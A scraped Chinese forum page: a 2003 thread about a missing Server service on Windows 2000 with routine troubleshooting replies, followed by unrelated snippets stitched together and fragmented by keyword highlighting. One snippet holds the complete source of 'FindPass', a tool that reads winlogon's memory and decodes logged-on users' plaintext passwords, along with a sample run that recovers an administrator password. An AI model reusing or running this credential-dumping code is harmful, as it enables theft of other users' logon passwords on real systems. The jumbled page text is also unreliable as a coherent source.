社区
windows网络管理与配置
帖子详情
关于win2kserver中的“服务”问题。
liujun6677
2003-10-18 12:16:40
win2kserver中有些操作如配置“路由和远程访问”等时,系统提示“没有打开服务器服务”......查看“计算机管理”中的“服务”没有“services”项,我看了别的正常的机器里有“services”,是不是这个就是所谓的“服务器服务”?它的可“执行程序”是c:\winnt\system32\services.exe。我在本机中也看到了这个文件。
如何解决这个问题?
...全文
41
6
打赏
收藏
关于win2kserver中的“服务”问题。
win2kserver中有些操作如配置“路由和远程访问”等时,系统提示“没有打开服务器服务”......查看“计算机管理”中的“服务”没有“services”项,我看了别的正常的机器里有“services”,是不是这个就是所谓的“服务器服务”?它的可“执行程序”是c:\winnt\system32\services.exe。我在本机中也看到了这个文件。 如何解决这个问题?
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
6 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
sungod8
2003-10-19
打赏
举报
回复
路由和远程访问需要启动的服务:
SERVER
Routing and Remote Access
Remote Registry Service
Q:控制面板-〉管理工具-〉服务-〉"Server"没有这一项!
日志中还提示“.....依存的服务lanmanserver不存在...”
A:网上邻居,属性,本地连接,属性,安装:"MICROSOFT 网络客户端"和"MICROSOFT网络文件和打印机共享"
liujun6677
2003-10-18
打赏
举报
回复
控制面板-〉管理工具-〉服务-〉"Server"没有这一项!
日志中还提示“.....依存的服务lanmanserver不存在...”
icuc88
2003-10-18
打赏
举报
回复
控制面板-〉管理工具-〉服务-〉Server
重新启动,
看看是不是服务被禁用之类的;或者所依存的服务没有启动
jy2004
2003-10-18
打赏
举报
回复
你看看协议坏了吗,估计有问题了
tanghui21
2003-10-18
打赏
举报
回复
不是services 而是server服务
如果没有这个服务 尝试 重装一下协议
ravenkatte
2003-10-18
打赏
举报
回复
打开开始-〉运行,输入services.msc打开服务控制台
如果不行,尝试用sfc /scannow命令来扫描并修复系统文件
win
2k
server
培训稿
win
2k
server
培训稿,作为
服务
器培训的基础教程,可以帮助大家学习了解到
服务
器的配置基础。本培训是初级教程
Win
2k
server
下的双机操作+双机管理软件LCHA的操作方法
本次双机操作,是用两台pc机,外加LSI8953USCSI卡、浪潮NS3500磁盘阵列柜和Sql
server
2005数据库实现的。本文重点谈双机管理软件LCHA的操作过程,
无法在Web
服务
器上启动调试。未将项目配置为进行调试
第一种: 如果你使用的是
Win
XP或者
Win
2k
Pro版的系统,你不会出现这个
问题
,因为你只能把网站放在C:\intpub\wwwroot目录下,这个目录默认的是http://localhost,是本地站点目录,不需要任何设置就可以调试。如果你是
Win
2k
Server
版本,想尽快解决这个
问题
,你使用IIS管理器把你的解决方案目录变成localhost的一个虚拟目录即可,立即可以进行调试,不过你必须用管理员身份登录。 第二种: 使用系统W:
Win
2k
Server
,使用IIS直接定义的网站。步骤如下: 1.必须把你做的网站的本地目录所在的逻辑分区转换成NTFS分区,否则不能使用asp.net的调试
服务
器安全设置.doc
服务
器安全设置,NT 2000
server
服务
器相关安全漏洞的安全设置,IIS相关安全策略,SQL
server
相关安全设置
用户名密码查询findpass
// Find Password from
win
logon in
win
2000 /
win
nt4 + < sp6 // // PasswordReminder.cpp --> FindPass.cpp // 1. http://www.smidgeonsoft.com/ // 2. shotgun add comment, bingle change a little to find other user in
win
logon // This code is licensed under the terms of the GPL (gnu public license). // // Usage: FindPass DomainName UserName PID-of-
Win
Logon // // you can get the three params from pulist output in target system. // /* 因为登陆的域名和用户名是明文存储在
win
logon进程里的,而PasswordReminder是限定了查找本进程用户的密码 <167-174: GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400); >,然后到
win
logon进程的空间
中
查找UserDomain和UserName < 590:// 在
Win
Logon的内存空间
中
寻找UserName和DomainName的字符串 if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0) && (wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_
WIN
2K
), UserDomain) == 0)) > ,找到后就查后边的加密口令。 其实只要你自己指定用户名和
win
logon进程去查找就行了,只要你是管理员,任何本机用msgina.dll图形登陆的用户口令都可以找到。 1. pulist,找到系统里登陆的域名和用户名,及
win
logon进程id 2. 然后给每个
win
logon进程id查找指定的用户就行了。 example: C:\Documents and Settings\bingle>pulist Process PID User Idle 0 System 8 smss.exe 164 NT AUTHORITY\SYSTEM csrss.exe 192 NT AUTHORITY\SYSTEM
win
logon.exe 188 NT AUTHORITY\SYSTEM
win
s.exe 1212 NT AUTHORITY\SYSTEM Explorer.exe 388 TEST-
2K
SERVER
\Administrator internat.exe 1828 TEST-
2K
SERVER
\Administrator conime.exe 1868 TEST-
2K
SERVER
\Administrator msiexec.exe 1904 NT AUTHORITY\SYSTEM tlntsvr.exe 1048 NT AUTHORITY\SYSTEM taskmgr.exe 1752 TEST-
2K
SERVER
\Administrator csrss.exe 2056 NT AUTHORITY\SYSTEM
win
logon.exe 2416 NT AUTHORITY\SYSTEM rdpclip.exe 2448 TEST-
2K
SERVER
\clovea Explorer.exe 2408 TEST-
2K
SERVER
\clovea internat.exe 1480 TEST-
2K
SERVER
\clovea cmd.exe 2508 TEST-
2K
SERVER
\Administrator ntshell.exe 368 TEST-
2K
SERVER
\Administrator ntshell.exe 1548 TEST-
2K
SERVER
\Administrator ntshell.exe 1504 TEST-
2K
SERVER
\Administrator csrss.exe 1088 NT AUTHORITY\SYSTEM
win
logon.exe 1876 NT AUTHORITY\SYSTEM rdpclip.exe 1680 TEST-
2K
SERVER
\bingle Explorer.exe 2244 TEST-
2K
SERVER
\bingle conime.exe 2288 TEST-
2K
SERVER
\bingle internat.exe 1592 TEST-
2K
SERVER
\bingle cmd.exe 1692 TEST-
2K
SERVER
\bingle mdm.exe 2476 TEST-
2K
SERVER
\bingle taskmgr.exe 752 TEST-
2K
SERVER
\bingle pulist.exe 2532 TEST-
2K
SERVER
\bingle C:\Documents and Settings\bingle>D:\FindPass.exe TEST-
2K
SERVER
administrator 188 To Find Password in the
Win
logon process Usage: D:\FindPass.exe DomainName UserName PID-of-
Win
Logon The debug privilege has been added to PasswordReminder. The
Win
Logon process id is 188 (0x000000bc). To find TEST-
2K
SERVER
\administrator password in process 188 ... The encoded password is found at 0x008e0800 and has a length of 10. The logon information is: TEST-
2K
SERVER
/administrator/test
server
. The hash byte is: 0x13. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-
2K
SERVER
clovea 1876 To Find Password in the
Win
logon process Usage: D:\FindPass.exe DomainName UserName PID-of-
Win
Logon The debug privilege has been added to PasswordReminder. The
Win
Logon process id is 1876 (0x00000754). To find TEST-
2K
SERVER
\clovea password in process 1876 ... PasswordReminder is unable to find the password in memory. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-
2K
SERVER
bingle 1876 To Find Password in the
Win
logon process Usage: D:\FindPass.exe DomainName UserName PID-of-
Win
Logon The debug privilege has been added to PasswordReminder. The
Win
Logon process id is 1876 (0x00000754). To find TEST-
2K
SERVER
\bingle password in process 1876 ... The logon information is: TEST-
2K
SERVER
/bingle. There is no password. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-
2K
SERVER
clovea 2416 To Find Password in the
Win
logon process Usage: D:\FindPass.exe DomainName UserName PID-of-
Win
Logon The debug privilege has been added to PasswordReminder. The
Win
Logon process id is 2416 (0x00000970). To find TEST-
2K
SERVER
\clovea password in process 2416 ... The logon information is: TEST-
2K
SERVER
/clovea. There is no password. C:\Documents and Settings\bingle> */ #include
#include <
win
dows.h> #include
#include
#include
typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; // Undocumented typedef's typedef struct _QUERY_SYSTEM_INFORMATION { DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; } QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER { DWORD Count; DWORD Unk04; DWORD Unk08; } PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO { DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name [0x108]; } PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO { DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; } ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); // Private Prototypes BOOL Is
Win
NT (void); BOOL Is
Win
2K
(void); BOOL AddDebugPrivilege (void); DWORD Find
Win
Logon (void); BOOL LocatePasswordPage
Win
NT (DWORD, PDWORD); BOOL LocatePasswordPage
Win
2K
(DWORD, PDWORD); void DisplayPassword
Win
NT (void); void DisplayPassword
Win
2K
(void); // Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0; wchar_t UserName [0x400]; wchar_t UserDomain [0x400]; int __cdecl main( int argc, char* argv[] ) { printf( "\n\t To Find Password in the
Win
logon process\n" ); printf( " Usage: %s DomainName UserName PID-of-
Win
Logon\n\n", argv[0] ); if ((!Is
Win
NT ()) && (!Is
Win
2K
())) { printf ("
Win
dows NT or
Win
dows 2000 are required.\n"); return (0); } // Add debug privilege to PasswordReminder - // this is needed for the search for
Win
logon. // 增加PasswordReminder的权限 // 使得PasswordReminder可以打开并调试
Win
logon进程 if (!AddDebugPrivilege ()) { printf ("Unable to add debug privilege.\n"); return (0); } printf ("The debug privilege has been added to PasswordReminder.\n"); // 获得几个未公开API的入口地址 HINSTANCE hNtDll = LoadLibrary ("NTDLL.DLL"); pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress (hNtDll, "NtQuerySystemInformation"); pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress (hNtDll, "RtlCreateQueryDebugBuffer"); pfnRtlQueryProcessDebugInformation = (PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress (hNtDll, "RtlQueryProcessDebugInformation"); pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress (hNtDll, "RtlDestroyQueryDebugBuffer"); pfnRtlRunDecodeUnicodeString = (PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress (hNtDll, "RtlRunDecodeUnicodeString"); // Locate
Win
Logon's PID - need debug privilege and admin rights. // 获得
Win
logon进程的PID // 这里作者使用了几个Native API,其实使用PSAPI一样可以 DWORD
Win
LogonPID = argc > 3 ? atoi( argv[3] ) : Find
Win
Logon () ; if (
Win
LogonPID == 0) { printf ("PasswordReminder is unable to find
Win
Logon or you are using NWGINA.DLL.\n"); printf ("PasswordReminder is unable to find the password in memory.\n"); FreeLibrary (hNtDll); return (0); } printf("The
Win
Logon process id is %d (0x%8.8lx).\n",
Win
LogonPID,
Win
LogonPID); // Set values to check memory block against. // 初始化几个和用户账号相关的变量 memset(UserName, 0, sizeof (UserName)); memset(UserDomain, 0, sizeof (UserDomain)); if( argc > 2 ) { mbstowcs( UserName, argv[2], sizeof(UserName)/sizeof(*UserName) ); mbstowcs( UserDomain, argv[1], sizeof(UserDomain)/sizeof(*UserDomain) ); }else { GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400); } printf( " To find %S\\%S password in process %d ...\n", UserDomain, UserName,
Win
LogonPID ); // Locate the block of memory containing // the password in
Win
Logon's memory space. // 在
Win
logon进程
中
定位包含Password的内存块 BOOL FoundPasswordPage = FALSE; if (Is
Win
2K
()) FoundPasswordPage = LocatePasswordPage
Win
2K
(
Win
LogonPID, &PasswordLength); else FoundPasswordPage = LocatePasswordPage
Win
NT (
Win
LogonPID, &PasswordLength); if (FoundPasswordPage) { if (PasswordLength == 0) { printf ("The logon information is: %S/%S.\n", UserDomain, UserName); printf ("There is no password.\n"); } else { printf ("The encoded password is found at 0x%8.8lx and has a length of %d.\n", RealPasswordP, PasswordLength); // Decode the password string. if (Is
Win
2K
()) DisplayPassword
Win
2K
(); else DisplayPassword
Win
NT (); } } else printf ("PasswordReminder is unable to find the password in memory.\n"); FreeLibrary (hNtDll); return (0); } // main // // Is
Win
NT函数用来判断操作系统是否
WIN
NT // BOOL Is
Win
NT (void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo)) return (OSVersionInfo.dwPlatformId == VER_PLATFORM_
WIN
32_NT); else return (FALSE); } // Is
Win
NT // // Is
Win
2K
函数用来判断操作系统是否
Win
2K
// BOOL Is
Win
2K
(void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo)) return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_
WIN
32_NT) && (OSVersionInfo.dwMajorVersion == 5)); else return (FALSE); } // Is
Win
2K
// // AddDebugPrivilege函数用来申请调试
Win
logon进程的特权 // BOOL AddDebugPrivilege (void) { HANDLE Token; TOKEN_PRIVILEGES TokenPrivileges, PreviousState; DWORD ReturnLength = 0; if (OpenProcessToken (GetCurrentProcess (), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token)) if (LookupPrivilegeValue (NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid)) { TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; return (AdjustTokenPrivileges (Token, FALSE, &TokenPrivileges, sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength)); } return (FALSE); } // AddDebugPrivilege // // Note that the follo
win
g code eliminates the need // for PSAPI.DLL as part of the executable. // Find
Win
Logon函数用来寻找
Win
Logon进程 // 由于作者使用的是Native API,因此不需要PSAPI的支持 // DWORD Find
Win
Logon (void) { #define INITIAL_ALLOCATION 0x100 DWORD rc = 0; DWORD SizeNeeded = 0; PVOID InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION); // Find how much memory is required. pfnNtQuerySystemInformation (0x10, InfoP, INITIAL_ALLOCATION, &SizeNeeded); HeapFree (GetProcessHeap (), 0, InfoP); // Now, allocate the proper amount of memory. InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SizeNeeded); DWORD SizeWritten = SizeNeeded; if (pfnNtQuerySystemInformation (0x10, InfoP, SizeNeeded, &SizeWritten)) { HeapFree (GetProcessHeap (), 0, InfoP); return (0); } DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION); if (NumHandles == 0) { HeapFree (GetProcessHeap (), 0, InfoP); return (0); } PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) InfoP; DWORD i; for (i = 1; i <= NumHandles; i++) { // "5" is the value of a kernel object type process. if (QuerySystemInformationP->HandleType == 5) { PVOID DebugBufferP = pfnRtlCreateQueryDebugBuffer (0, 0); if (pfnRtlQueryProcessDebugInformation (QuerySystemInformationP->PID, 1, DebugBufferP) == 0) { PPROCESS_INFO_HEADER ProcessInfoHeaderP = (PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60); DWORD Count = ProcessInfoHeaderP->Count; PPROCESS_INFO ProcessInfoP = (PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER)); if (strstr (_strupr (ProcessInfoP->Name), "
WIN
LOGON") != 0) { DWORD i; DWORD dw = (DWORD) ProcessInfoP; for (i = 0; i < Count; i++) { dw += sizeof (PROCESS_INFO); ProcessInfoP = (PPROCESS_INFO) dw; if (strstr (_strupr (ProcessInfoP->Name), "NWGINA") != 0) return (0); if (strstr (_strupr (ProcessInfoP->Name), "MSGINA") == 0) rc = QuerySystemInformationP->PID; } if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); HeapFree (GetProcessHeap (), 0, InfoP); return (rc); } } if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); } DWORD dw = (DWORD) QuerySystemInformationP; dw += sizeof (QUERY_SYSTEM_INFORMATION); QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw; } HeapFree (GetProcessHeap (), 0, InfoP); return (rc); } // Find
Win
Logon // // LocatePasswordPage
Win
NT函数用来在NT
中
找到用户密码 // BOOL LocatePasswordPage
Win
NT (DWORD
Win
LogonPID, PDWORD PasswordLength) { #define USER_DOMAIN_OFFSET_
WIN
NT 0x200 #define USER_PASSWORD_OFFSET_
WIN
NT 0x400 BOOL rc = FALSE; HANDLE
Win
LogonHandle = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE,
Win
LogonPID); if (
Win
LogonHandle == 0) return (rc); *PasswordLength = 0; SYSTEM_INFO SystemInfo; GetSystemInfo (&SystemInfo); DWORD PEB = 0x7ffdf000; DWORD BytesCopied = 0; PVOID PEBP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SystemInfo.dwPageSize); if (!ReadProcessMemory (
Win
LogonHandle, (PVOID) PEB, PEBP, SystemInfo.dwPageSize, &BytesCopied)) { CloseHandle (
Win
LogonHandle); return (rc); } // Grab the value of the 2nd DWORD in the TEB. PDWORD
Win
LogonHeap = (PDWORD) ((DWORD) PEBP + (6 * sizeof (DWORD))); MEMORY_BASIC_INFORMATION MemoryBasicInformation; if (VirtualQueryEx (
Win
LogonHandle, (PVOID) *
Win
LogonHeap, &MemoryBasicInformation, sizeof (MEMORY_BASIC_INFORMATION))) if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT) && ((MemoryBasicInformation.Protect & PAGE_GUARD) == 0)) { PVOID
Win
LogonMemP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, MemoryBasicInformation.RegionSize); if (ReadProcessMemory (
Win
LogonHandle, (PVOID) *
Win
LogonHeap,
Win
LogonMemP, MemoryBasicInformation.RegionSize, &BytesCopied)) { DWORD i = (DWORD)
Win
LogonMemP; DWORD UserNamePos = 0; // The order in memory is UserName followed by the UserDomain. // 在内存
中
搜索UserName和UserDomain字符串 do { if ((wcsicmp (UserName, (wchar_t *) i) == 0) && (wcsicmp (UserDomain, (wchar_t *) (i + USER_DOMAIN_OFFSET_
WIN
NT)) == 0)) { UserNamePos = i; break; } i += 2; } while (i < (DWORD)
Win
LogonMemP + MemoryBasicInformation.RegionSize); if (UserNamePos) { PENCODED_PASSWORD_INFO EncodedPasswordInfoP = (PENCODED_PASSWORD_INFO) ((DWORD) UserNamePos + USER_PASSWORD_OFFSET_
WIN
NT); FILETIME LocalFileTime; SYSTEMTIME SystemTime; if (FileTimeToLocalFileTime (&EncodedPasswordInfoP->LoggedOn, &LocalFileTime)) if (FileTimeToSystemTime (&LocalFileTime, &SystemTime)) printf ("You logged on at %d/%d/%d %d:%d:%d\n", SystemTime.wMonth, SystemTime.wDay, SystemTime.wYear, SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond); *PasswordLength = (EncodedPasswordInfoP->EncodedPassword.Length & 0x00ff) / sizeof (wchar_t); // NT就是好,hash-byte直接放在编码
中
:) HashByte = (EncodedPasswordInfoP->EncodedPassword.Length & 0xff00) >> 8; RealPasswordP = (PVOID) (*
Win
LogonHeap + (UserNamePos - (DWORD)
Win
LogonMemP) + USER_PASSWORD_OFFSET_
WIN
NT + 0x34); PasswordP = (PVOID) ((PBYTE) (UserNamePos + USER_PASSWORD_OFFSET_
WIN
NT + 0x34)); rc = TRUE; } } } HeapFree (GetProcessHeap (), 0, PEBP); CloseHandle (
Win
LogonHandle); return (rc); } // LocatePasswordPage
Win
NT // // LocatePasswordPage
Win
2K
函数用来在
Win
2K
中
找到用户密码 // BOOL LocatePasswordPage
Win
2K
(DWORD
Win
LogonPID, PDWORD PasswordLength) { #define USER_DOMAIN_OFFSET_
WIN
2K
0x400 #define USER_PASSWORD_OFFSET_
WIN
2K
0x800 HANDLE
Win
LogonHandle = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE,
Win
LogonPID); if (
Win
LogonHandle == 0) return (FALSE); *PasswordLength = 0; SYSTEM_INFO SystemInfo; GetSystemInfo (&SystemInfo); DWORD i = (DWORD) SystemInfo.lpMinimumApplicationAddress; DWORD MaxMemory = (DWORD) SystemInfo.lpMaximumApplicationAddress; DWORD Increment = SystemInfo.dwPageSize; MEMORY_BASIC_INFORMATION MemoryBasicInformation; while (i < MaxMemory) { if (VirtualQueryEx (
Win
LogonHandle, (PVOID) i, &MemoryBasicInformation, sizeof (MEMORY_BASIC_INFORMATION))) { Increment = MemoryBasicInformation.RegionSize; if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT) && ((MemoryBasicInformation.Protect & PAGE_GUARD) == 0)) { PVOID RealStartingAddressP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, MemoryBasicInformation.RegionSize); DWORD BytesCopied = 0; if (ReadProcessMemory (
Win
LogonHandle, (PVOID) i, RealStartingAddressP, MemoryBasicInformation.RegionSize, &BytesCopied)) { // 在
Win
Logon的内存空间
中
寻找UserName和DomainName的字符串 if ((wcsicmp ((wchar_t *) RealStartingAddressP, UserName) == 0) && (wcsicmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_
WIN
2K
), UserDomain) == 0)) { RealPasswordP = (PVOID) (i + USER_PASSWORD_OFFSET_
WIN
2K
); PasswordP = (PVOID) ((DWORD) RealStartingAddressP + USER_PASSWORD_OFFSET_
WIN
2K
); // Calculate the length of encoded unicode string. // 计算出密文的长度 PBYTE p = (PBYTE) PasswordP; DWORD Loc = (DWORD) p; DWORD Len = 0; if ((*p == 0) && (* (PBYTE) ((DWORD) p + 1) == 0)) ; else do { Len++; Loc += 2; p = (PBYTE) Loc; } while (*p != 0); *PasswordLength = Len; CloseHandle (
Win
LogonHandle); return (TRUE); } } HeapFree (GetProcessHeap (), 0, RealStartingAddressP); } } else Increment = SystemInfo.dwPageSize; // Move to next memory block. i += Increment; } CloseHandle (
Win
LogonHandle); return (FALSE); } // LocatePasswordPage
Win
2K
// // DisplayPassword
Win
NT函数用来在NT
中
解码用户密码 // void DisplayPassword
Win
NT (void) { UNICODE_STRING EncodedString; EncodedString.Length = (WORD) PasswordLength * sizeof (wchar_t); EncodedString.MaximumLength = ((WORD) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t); EncodedString.Buffer = (PWSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, EncodedString.MaximumLength); CopyMemory (EncodedString.Buffer, PasswordP, PasswordLength * sizeof (wchar_t)); // Finally - decode the password. // Note that only one call is required since the hash-byte // was part of the orginally encoded string. // 在NT
中
,hash-byte是包含在编码
中
的 // 因此只需要直接调用函数解码就可以了 pfnRtlRunDecodeUnicodeString ((BYTE) HashByte, &EncodedString); printf ("The logon information is: %S/%S/%S.\n", UserDomain, UserName, EncodedString.Buffer); printf ("The hash byte is: 0x%2.2x.\n", HashByte); HeapFree (GetProcessHeap (), 0, EncodedString.Buffer); } // DisplayPassword
Win
NT // // DisplayPassword
Win
2K
函数用来在
Win
2K
中
解码用户密码 // void DisplayPassword
Win
2K
(void) { DWORD i, Hash = 0; UNICODE_STRING EncodedString; EncodedString.Length = (USHORT) PasswordLength * sizeof (wchar_t); EncodedString.MaximumLength = ((USHORT) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t); EncodedString.Buffer = (PWSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, EncodedString.MaximumLength); // This is a brute force technique since the hash-byte // is not stored as part of the encoded string - :>(. // 因为在
Win
2K
中
hash-byte并不存放在编码
中
// 所以在这里进行的是暴力破解 // 下面的循环
中
i就是hash-byte // 我们将i从0x00到0xff分别对密文进行解密 // 如果有一个hash-byte使得所有密码都是可见字符,就认为是有效的 // 这个算法实际上是从概率角度来解码的 // 因为如果hash-byte不对而解密出来的密码都是可见字符的概率非常小 for (i = 0; i <= 0xff; i++) { CopyMemory (EncodedString.Buffer, PasswordP, PasswordLength * sizeof (wchar_t)); // Finally - try to decode the password. // 使用i作为hash-byte对密文进行解码 pfnRtlRunDecodeUnicodeString ((BYTE) i, &EncodedString); // Check for a viewable password. // 检查解码出的密码是否完全由可见字符组成 // 如果是则认为是正确的解码 PBYTE p = (PBYTE) EncodedString.Buffer; BOOL Viewable = TRUE; DWORD j, k; for (j = 0; (j < PasswordLength) && Viewable; j++) { if ((*p) && (* (PBYTE)(DWORD (p) + 1) == 0)) { if (*p < 0x20) Viewable = FALSE; if (*p > 0x7e) Viewable = FALSE; //0x20是空格,0X7E是~,所有密码允许使用的可见字符都包括在里面了 } else Viewable = FALSE; k = DWORD (p); k++; k++; p = (PBYTE) k; } if (Viewable) { printf ("The logon information is: %S/%S/%S.\n", UserDomain, UserName, EncodedString.Buffer); printf ("The hash byte is: 0x%2.2x.\n", i); } } HeapFree (GetProcessHeap (), 0, EncodedString.Buffer); } // DisplayPassword
Win
2K
// end PasswordReminder.cpp
windows网络管理与配置
6,185
社区成员
60,364
社区内容
发帖
与我相关
我的任务
windows网络管理与配置
windows网络管理与配置
复制链接
扫一扫
分享
社区描述
windows网络管理与配置
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章